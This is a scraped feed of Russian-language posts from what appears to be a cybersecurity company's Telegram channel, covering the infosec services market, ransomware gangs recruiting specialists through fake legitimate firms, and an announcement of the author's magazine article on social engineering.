Если без иронии, то этот пост чуть более чем описывает состояние рынка услуг ИБ в России. Вы или ищете друга, у которого есть друг, и рассчитываете на порядочность всех участников цепочки, или платите "сантехнику" за 100500 рублей в час. Ну, или покупаете стартап по прочистке труб/нанимаете команду.
Сервисы (вроде 3side, но не только) не просто делают жизнь проще. Они исправляют ассиметрию информации и превращают "восточный базар" в эффективный рынок, на котором жить становится проще примерно всем.
Если без иронии, то этот пост чуть более чем описывает состояние рынка услуг ИБ в России. Вы или ищете друга, у которого есть друг, и рассчитываете на порядочность всех участников цепочки, или платите "сантехнику" за 100500 рублей в час. Ну, или покупаете стартап по прочистке труб/нанимаете команду.
Сервисы (вроде 3side, но не только) не просто делают жизнь проще. Они исправляют ассиметрию информации и превращают "восточный базар" в эффективный рынок, на котором жить становится проще примерно всем.
Telegram
Картавых Александр
Кстати, одна из самых убогих примет конца нулевых и начала десятых годов это ебаные таксисты, сантехники, мастера и прочие такие персонажи, которые приходят в твою жизнь решить какие-то проблемы за деньги и называют ценник В ЗАВИСИМОСТИ ОТ ТОГО, СКОЛЬКО ТЫ…
🔥15👍8👨💻1
Как российские кибервымогатели вербуют специалистов под видом легального бизнеса
Самое "прекрасное" в недавней истории про SugarLocker — не в том, как вымогатели работали, а в том, как они вербовали людей. А делали они это под видом вполне легальной компании с прекрасным названием Shtazi-IT. То есть еще раз, киберкриминал вполне официально мог давать объявление на условном HH. Кстати, история в России далеко не самая редкая, мы сами натыкались на "странные" вакансии.
К слову, в США тоже были похожие истории. Например, в 21 году там участник хакерской группировки FIN7 получил семь лет тюрьмы. На суде его адвокат заявлял, что в группировку тот попал случайно — после того, как откликнулся на объявление о вакансии в ИБ-компании Combi Security.
Мы это к чему. Вербовка ИБ-специалистов в рансом на вполне легальных площадках — это вполне себе современная действительность.
Самое "прекрасное" в недавней истории про SugarLocker — не в том, как вымогатели работали, а в том, как они вербовали людей. А делали они это под видом вполне легальной компании с прекрасным названием Shtazi-IT. То есть еще раз, киберкриминал вполне официально мог давать объявление на условном HH. Кстати, история в России далеко не самая редкая, мы сами натыкались на "странные" вакансии.
К слову, в США тоже были похожие истории. Например, в 21 году там участник хакерской группировки FIN7 получил семь лет тюрьмы. На суде его адвокат заявлял, что в группировку тот попал случайно — после того, как откликнулся на объявление о вакансии в ИБ-компании Combi Security.
Мы это к чему. Вербовка ИБ-специалистов в рансом на вполне легальных площадках — это вполне себе современная действительность.
XAKEP
FACCT и МВД сообщили о ликвидации вымогательской группы SugarLocker
МВД России, при поддержке специалистов компании FAССT (бывшая Group-IB), вычислило и задержало участников хак-группы SugarLocker. Сообщается, что хакеры работали «под вывеской» легальной ИТ-компании Shtazi-IT, якобы предлагающей услуги по разработке лендингов…
👍10🔥6❤1
3side кибербезопасности
BrainSploit. Эксплойты социальной инженерии. Теперь уже можно говорить, что выступление на Highload++ 2023 удалось! По оценкам организаторов доклад попал в топ лучших конференции. Я же был приятно удивлён такому количеству вопросов из зала, а после доклада…
Статья на Хакере
По мотивам моего выступления на Highload написал статью в легендарный журнал Хакер. Статья для целевой аудитории журнала, стиль подбирал под нее же, добавил хакерскую специфику не типичную для этого канала.
Для меня это важное достижение, ведь еще подростком я читал журнал запоем и старался не пропускать каждый выпуск! Часть статей понять было сложно, а уж о том, чтобы написать туда и даже не мечтал. Когда я пришел в профессию, точно понял, что рано или поздно что-то туда напишу и внесу свой вклад. Но нужна была особенная достойная тема, наконец я ее нашел!
Журнал доступен по подписке, но насколько я знаю, через 2 месяца статья будет целиком доступна бесплатно!
https://xakep.ru/2024/02/21/mind-exploits/
По мотивам моего выступления на Highload написал статью в легендарный журнал Хакер. Статья для целевой аудитории журнала, стиль подбирал под нее же, добавил хакерскую специфику не типичную для этого канала.
Для меня это важное достижение, ведь еще подростком я читал журнал запоем и старался не пропускать каждый выпуск! Часть статей понять было сложно, а уж о том, чтобы написать туда и даже не мечтал. Когда я пришел в профессию, точно понял, что рано или поздно что-то туда напишу и внесу свой вклад. Но нужна была особенная достойная тема, наконец я ее нашел!
Журнал доступен по подписке, но насколько я знаю, через 2 месяца статья будет целиком доступна бесплатно!
https://xakep.ru/2024/02/21/mind-exploits/
xakep.ru
Выносим мозг. Как работают эксплоиты социальной инженерии
Социальную инженерию часто применяют при комплексных пентестах, и зачастую успешно, но, понимая принципы психологии и составив сценарий с их учетом, можно значительно повысить процент успешных взаимодействий. В этой статье мы разберем основные уловки и причины…
👍19❤10🔥5